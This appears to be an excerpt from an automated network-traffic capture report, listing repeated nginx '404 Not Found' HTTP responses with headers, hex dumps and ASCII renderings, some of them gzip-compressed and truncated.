          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 22 Sep 2024 15:38:09 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 61 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4d 8e 31 0f 82 30 10 85 f7 fe 8a 93 5d 0e 0d e3 a5 83 02 91 04 91 98 32 38 62 5a 53 12 a4 48 8b c6 7f 2f 85 c5 f1 dd fb ee cb a3 4d 72 39 8a 5b 95 c2 49 9c 0b a8 ea 43 91 1f 21 d8 22 e6 a9 c8 10 13 91 ac cd 3e 8c 10 d3 32 e0 8c b4 7b 76 9c b4 6a e4 1c 5c eb 3a c5 e3 28 86 d2 38 c8 cc d4 4b c2 f5 c8 08 17 88 ee 46 7e fd df 8e ff 31 73 62 34 70 a1 15 8c ea 35 29 eb 94 84 fa 5a c0 a7 b1 d0 cf dc c3 73 60 7a 70 ba b5 60 d5 f8 56 63 48 38 78 ef 62 9c 1d 7e 09 fb 01 f3 7c 15 3c c4 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: adM10]28bZSH/Mr9[IC!">2{vj\:(8KF~1sb4p5)Zs`zp`VcH8xb~|<0
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 22 Sep 2024 15:38:12 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 61 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4d 8e 31 0f 82 30 10 85 f7 fe 8a 93 5d 0e 0d e3 a5 83 02 91 04 91 98 32 38 62 5a 53 12 a4 48 8b c6 7f 2f 85 c5 f1 dd fb ee cb a3 4d 72 39 8a 5b 95 c2 49 9c 0b a8 ea 43 91 1f 21 d8 22 e6 a9 c8 10 13 91 ac cd 3e 8c 10 d3 32 e0 8c b4 7b 76 9c b4 6a e4 1c 5c eb 3a c5 e3 28 86 d2 38 c8 cc d4 4b c2 f5 c8 08 17 88 ee 46 7e fd df 8e ff 31 73 62 34 70 a1 15 8c ea 35 29 eb 94 84 fa 5a c0 a7 b1 d0 cf dc c3 73 60 7a 70 ba b5 60 d5 f8 56 63 48 38 78 ef 62 9c 1d 7e 09 fb 01 f3 7c 15 3c c4 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: adM10]28bZSH/Mr9[IC!">2{vj\:(8KF~1sb4p5)Zs`zp`VcH8xb~|<0
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 22 Sep 2024 15:38:14 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 196Connection: closeVary: Accept-EncodingData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 22 Sep 2024 15:38:43 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 22 Sep 2024 15:38:45 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 22 Sep 2024 15:38:48 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 22 Sep 2024 15:38:50 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 22 Sep 2024 15:38:57 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "66df00c6-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 22 Sep 2024 15:38:59 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "66df00c6-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 22 Sep 2024 15:39:02 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "66df00c6-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 22 Sep 2024 15:39:04 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "66df00c6-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 22 Sep 2024 15:39:10 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 65 33 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6d 6f db d6 15 fe 9e 5f 71 a3 01 96 94 88 64 9c b4 43 12 4b 72 d3 a4 db 97 b4 1d e0 74 c3 e0 a6 c2 15 75 2d b1 a2 48 8d a4 ec a8 49 80 36 e9 2b 1a 34 68 57 60 43 b1 f7 61 d8 a7 01 89 13 af 6e 5e 9c bf 40 fe a3 3d e7 5c 92 a2 64 c9 71 d2 b4 ab 01 db d2 7d 3d f7 9c e7 3c e7 dc 97 fa d1 8e 6f 47 e3 a1 12 bd 68 e0 36 eb f4 57 d8 ae 0c c3 46 c9 09 5b b2 23 87 91 b3 a9 4a c2 95 5e b7 51 0a 46 25 b4 51 b2 d3 ac 0f 54 24 85 dd 93 41 a8 a2 46 e9 ad 4b bf 30 4e a3 8e 4b 3d 39 50 8d d2 50 06 7d c7 eb 96 84 ed 7b 91 f2 d0 28 50 dd 60 64 04 18 73 ba e5 a6 a3 b6 86 7e 10 15 9a 6e 39 9d a8 d7 e8 a8 4d c7 56 06 7f a9 39 9e 13 39 d2 35 42 5b ba aa b1 8c 21 22 27 72 55 73 6b 6b cb 94 6e 5b 05 be d1 d9 54 81 63 fa 9e eb 78 aa 6e e9 ea 3a be f4 45 a0 dc 46 29 8c c6 ae 0a 7b 4a 61 a6 81 ea 38 b2 51 92 ae 5b 12 bd 40 6d e4 f2 b2 7c 86 1c 45 be 69 87 21 66 99 f4 77 b0 92 ac f5 86 84 68 be 67 e2 cf ea 72 49 90 0a a1 b1 81 ec 2a eb 8a c1 0d 9b f5 d0 0e 9c 61 d4 b4 8e d5 8f ae 9f bf 70 ee d2 b9 f5 63 d6 91 2d c7 eb f8 5b 66 14 48 bb bf c6 0d 2e fa b2 23 1a 62 63 e4 d9 91 e3 7b 95 ea d5 eb 2b 47 ac 63 97 2f 37 8f 59 75 2b 1d 24 1d 4c 60 71 68 de 28 cd 1f a6 52 b6 06 d2 73 36 54 18 99 ef 86 e5 6a 09 ed 55 10 f8 c1 21 3b d4 c4 32 fa 84 81 dd 28 15 07 82 61 32 43 8f a2 0d 36 f4 33 cb 45 a8 81 ed 48 23 e1 a1 65 9b ed 54 94 6f a6 ee 20 19 2d 0d d9 b6 df 19 67 e0 6e 1b 43 d8 4a e8 7f 2d 32 5f 2b 05 2c 97 31 74 27 9f 5a ed 6e cb 75 ba bd 08 78 a0 b1 54 50 1c 87 1b b7 5a 69 05 0d 39 55 a2 47 4f 61 df 71 36 17 76 35 3c 3f 22 91 22 75 05 13 c5 5f c7 7b f1 a3 78 27 7e 2c e2 6f e3 3b c9 fb f8 78 2f de 4d 3e 48 6e e0 f3 2e 7e f7 e2 ed f8 0e 55 6f 2f 79 ed 70 b8 52 87 43 6a d7 6d 1b 84 da 0c ab bd 28 1a 86 67 2d 0b fe 67 c2 83 b5 33 78 fe 86 ef ba fe 96 f0 7c 7f a8 80 12 7c 80 1f 00 2d 2a 00 9e 65 d0 25 bf 6e b5 e1 f8 7d 08 f3 37 9a dd 4c de 4f 6e d6 2d d9 ac 5b 58 47 b3 3e b3 98 ae 6a b5 52 67 37 b6 02 39 1c 62 d0 54 c1 b3 e5 2d f6 c5 16 7c 01 cc b0 b0 11 9b a5 e7 87 11 78 c4 08 23 19 39 36 0c 30 33 eb 94 ae 8d 74 7e b2 d3 f2 44 1b 33 16 31 98 1a 4a 8b a9 a3 b7 dc ac 0f 17 77 ef 28 0d 64 78 eb b3 9b ab de 0e 9a f1 ae b6 58 fc 84 4c 19 3f 61 f3 3e d8 67 d0 29 ad 0f 17 ad bc 3d 8a 22 df 0b 33 95 63 e9 05 1c e8 4a 48 a9 3f c0 0e ae 1f b4 d8 d0 ca b3 09 6d 69 45 e8 bc a7 5a 80 c0 40 ba 6c 8f 54 ad 79 ff 5c 85 69 7b b6 0d 98 b9 30 c4 50 76 3a b0 54 cb 25 f0 cc 82 8f 68 5a 03 d0 da ea f9 4e 68 ad da 3d 65 f7 1b 4b 1d 0e 17 0b 58 7c 49 0e 86 2b e8 d6 0a fd 51 60 ab 46 26 05 f1 73 a9 f9 1b 1a 88 f0 28 8a 4b 26 f7 29 2e 81 09 bc e0 95 07 2f a9 e3 0f a4 93 d3 7c e6 3a 05 e9 75 03 cb 53 5b d6 ea 28 1a 64 92 2d 5a 00 35 a1 60 33 1a 64 c2 2f 51 91 8d 85 49 a7 eb 35 42 a8 cb eb b4 30 dc c1 6b 8d ff 01 78 fc 37 de 11 c9 47 f1 5e f2 49 72 53 c4 f7 33 82 38 5a f0 c9 70 28 b
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 22 Sep 2024 15:39:10 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 65 33 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6d 6f db d6 15 fe 9e 5f 71 a3 01 96 94 88 64 9c b4 43 12 4b 72 d3 a4 db 97 b4 1d e0 74 c3 e0 a6 c2 15 75 2d b1 a2 48 8d a4 ec a8 49 80 36 e9 2b 1a 34 68 57 60 43 b1 f7 61 d8 a7 01 89 13 af 6e 5e 9c bf 40 fe a3 3d e7 5c 92 a2 64 c9 71 d2 b4 ab 01 db d2 7d 3d f7 9c e7 3c e7 dc 97 fa d1 8e 6f 47 e3 a1 12 bd 68 e0 36 eb f4 57 d8 ae 0c c3 46 c9 09 5b b2 23 87 91 b3 a9 4a c2 95 5e b7 51 0a 46 25 b4 51 b2 d3 ac 0f 54 24 85 dd 93 41 a8 a2 46 e9 ad 4b bf 30 4e a3 8e 4b 3d 39 50 8d d2 50 06 7d c7 eb 96 84 ed 7b 91 f2 d0 28 50 dd 60 64 04 18 73 ba e5 a6 a3 b6 86 7e 10 15 9a 6e 39 9d a8 d7 e8 a8 4d c7 56 06 7f a9 39 9e 13 39 d2 35 42 5b ba aa b1 8c 21 22 27 72 55 73 6b 6b cb 94 6e 5b 05 be d1 d9 54 81 63 fa 9e eb 78 aa 6e e9 ea 3a be f4 45 a0 dc 46 29 8c c6 ae 0a 7b 4a 61 a6 81 ea 38 b2 51 92 ae 5b 12 bd 40 6d e4 f2 b2 7c 86 1c 45 be 69 87 21 66 99 f4 77 b0 92 ac f5 86 84 68 be 67 e2 cf ea 72 49 90 0a a1 b1 81 ec 2a eb 8a c1 0d 9b f5 d0 0e 9c 61 d4 b4 8e d5 8f ae 9f bf 70 ee d2 b9 f5 63 d6 91 2d c7 eb f8 5b 66 14 48 bb bf c6 0d 2e fa b2 23 1a 62 63 e4 d9 91 e3 7b 95 ea d5 eb 2b 47 ac 63 97 2f 37 8f 59 75 2b 1d 24 1d 4c 60 71 68 de 28 cd 1f a6 52 b6 06 d2 73 36 54 18 99 ef 86 e5 6a 09 ed 55 10 f8 c1 21 3b d4 c4 32 fa 84 81 dd 28 15 07 82 61 32 43 8f a2 0d 36 f4 33 cb 45 a8 81 ed 48 23 e1 a1 65 9b ed 54 94 6f a6 ee 20 19 2d 0d d9 b6 df 19 67 e0 6e 1b 43 d8 4a e8 7f 2d 32 5f 2b 05 2c 97 31 74 27 9f 5a ed 6e cb 75 ba bd 08 78 a0 b1 54 50 1c 87 1b b7 5a 69 05 0d 39 55 a2 47 4f 61 df 71 36 17 76 35 3c 3f 22 91 22 75 05 13 c5 5f c7 7b f1 a3 78 27 7e 2c e2 6f e3 3b c9 fb f8 78 2f de 4d 3e 48 6e e0 f3 2e 7e f7 e2 ed f8 0e 55 6f 2f 79 ed 70 b8 52 87 43 6a d7 6d 1b 84 da 0c ab bd 28 1a 86 67 2d 0b fe 67 c2 83 b5 33 78 fe 86 ef ba fe 96 f0 7c 7f a8 80 12 7c 80 1f 00 2d 2a 00 9e 65 d0 25 bf 6e b5 e1 f8 7d 08 f3 37 9a dd 4c de 4f 6e d6 2d d9 ac 5b 58 47 b3 3e b3 98 ae 6a b5 52 67 37 b6 02 39 1c 62 d0 54 c1 b3 e5 2d f6 c5 16 7c 01 cc b0 b0 11 9b a5 e7 87 11 78 c4 08 23 19 39 36 0c 30 33 eb 94 ae 8d 74 7e b2 d3 f2 44 1b 33 16 31 98 1a 4a 8b a9 a3 b7 dc ac 0f 17 77 ef 28 0d 64 78 eb b3 9b ab de 0e 9a f1 ae b6 58 fc 84 4c 19 3f 61 f3 3e d8 67 d0 29 ad 0f 17 ad bc 3d 8a 22 df 0b 33 95 63 e9 05 1c e8 4a 48 a9 3f c0 0e ae 1f b4 d8 d0 ca b3 09 6d 69 45 e8 bc a7 5a 80 c0 40 ba 6c 8f 54 ad 79 ff 5c 85 69 7b b6 0d 98 b9 30 c4 50 76 3a b0 54 cb 25 f0 cc 82 8f 68 5a 03 d0 da ea f9 4e 68 ad da 3d 65 f7 1b 4b 1d 0e 17 0b 58 7c 49 0e 86 2b e8 d6 0a fd 51 60 ab 46 26 05 f1 73 a9 f9 1b 1a 88 f0 28 8a 4b 26 f7 29 2e 81 09 bc e0 95 